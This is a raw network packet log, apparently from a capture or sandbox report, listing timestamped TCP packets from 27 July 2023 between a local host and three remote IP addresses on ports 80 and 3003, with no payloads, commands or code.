Jul 27, 2023 20:18:52.872832060 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872850895 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872869968 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872888088 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872908115 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872911930 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.872926950 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872946978 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.872984886 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.873008013 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:52.938570976 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.938627005 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:52.938746929 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.054336071 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062628031 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062666893 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062686920 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062705040 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062724113 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062722921 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062742949 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062752008 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062766075 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062783957 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062803984 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062823057 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062827110 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062841892 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062860966 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062861919 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062880039 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062899113 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062913895 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062937021 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.062978029 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.062997103 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063014984 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063030958 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063034058 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063055038 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063074112 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063081980 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063092947 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063111067 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063112020 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063131094 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063148022 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063150883 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063170910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063189983 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063200951 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063209057 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063225031 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063230038 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063250065 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063267946 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063280106 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063286066 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063303947 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063307047 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063325882 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063365936 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063379049 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063384056 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063401937 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063402891 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063422918 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063441992 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063452959 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063460112 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063478947 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063483953 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063498020 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063508034 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063517094 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063534975 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063551903 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063553095 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063571930 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063590050 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063605070 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063607931 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063627005 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063627005 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063647032 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063659906 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063664913 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063684940 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063703060 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063719988 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063736916 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063738108 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063757896 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063776016 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063785076 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063793898 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063808918 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063813925 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063832998 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063849926 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063868046 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063883066 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063884974 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063904047 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063921928 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063936949 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063940048 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063958883 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063958883 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063978910 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.063994884 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.063997030 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.064017057 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.064035892 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:53.064049006 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.064075947 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.064522982 CEST	49686	80	192.168.2.4	115.88.24.200
Jul 27, 2023 20:18:53.307452917 CEST	80	49686	115.88.24.200	192.168.2.4
Jul 27, 2023 20:18:54.278717041 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:54.294971943 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:54.295087099 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:55.033066988 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:55.049609900 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:55.049879074 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:55.050307035 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:55.050352097 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:55.066498041 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:55.066524982 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:55.181982994 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:55.182048082 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:55.182193995 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:56.558240891 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:56.558286905 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:56.574506998 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:56.574542046 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:56.637908936 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:56.637969971 CEST	80	49688	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:56.638120890 CEST	49688	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:56.717725039 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.755985975 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.756088018 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.756391048 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.796514034 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796554089 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796571016 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796590090 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796607018 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796623945 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796643019 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796659946 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.796684980 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796694994 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.796711922 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796726942 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.796739101 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796755075 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.796770096 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.834968090 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835007906 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835026979 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835046053 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835058928 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835072041 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835091114 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835112095 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835136890 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835153103 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835163116 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835181952 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835200071 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835211039 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835227966 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835246086 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835256100 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835273981 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835289955 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835299969 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835316896 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835329056 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835342884 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835361004 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835377932 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835386992 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835403919 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835412025 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.835428953 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835443974 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.835478067 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873630047 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873663902 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873683929 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873703003 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873716116 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873739958 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873752117 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873770952 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873806953 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873817921 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873835087 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873855114 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873867035 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873882055 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873900890 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873917103 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873928070 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873945951 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873960018 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.873972893 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.873990059 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874002934 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874016047 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874032974 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874046087 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874061108 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874078989 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874094009 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874111891 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874130964 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874151945 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874156952 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874175072 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874191999 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874211073 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874229908 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874248028 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874262094 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874275923 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874289989 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874301910 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874315023 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874327898 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874346018 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874360085 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874387026 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874433041 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874504089 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874525070 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874546051 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874556065 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874574900 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874597073 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874603033 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874619961 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874629974 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874644995 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874664068 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874680042 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.874690056 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874705076 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.874727011 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.914911985 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.914949894 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.914969921 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.914989948 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915008068 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915025949 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915044069 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915066957 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915085077 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915102005 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915123940 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915138006 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915154934 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915173054 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915194035 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915200949 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915214062 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915231943 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915244102 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915261984 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915281057 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915297985 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915308952 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915327072 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915344954 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915364027 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915381908 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915400028 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915407896 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915425062 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915435076 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915452003 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915460110 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915477991 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915494919 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915514946 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915522099 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915539026 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915553093 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915565014 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915582895 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915606022 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915620089 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915638924 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915652990 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915666103 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915684938 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915698051 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915710926 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915726900 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915744066 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915751934 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915771008 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915790081 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915805101 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915816069 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915833950 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915848017 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915860891 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915879011 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915895939 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915905952 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915925026 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915937901 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915951014 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915967941 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.915985107 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.915994883 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916012049 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916026115 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.916038036 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916054964 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916070938 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.916080952 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916094065 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.916112900 CEST	49689	3003	192.168.2.4	95.214.25.207
Jul 27, 2023 20:18:56.954375029 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954452038 CEST	3003	49689	95.214.25.207	192.168.2.4
Jul 27, 2023 20:18:56.954505920 CEST	3003	49689	95.214.25.207	192.168.2.4
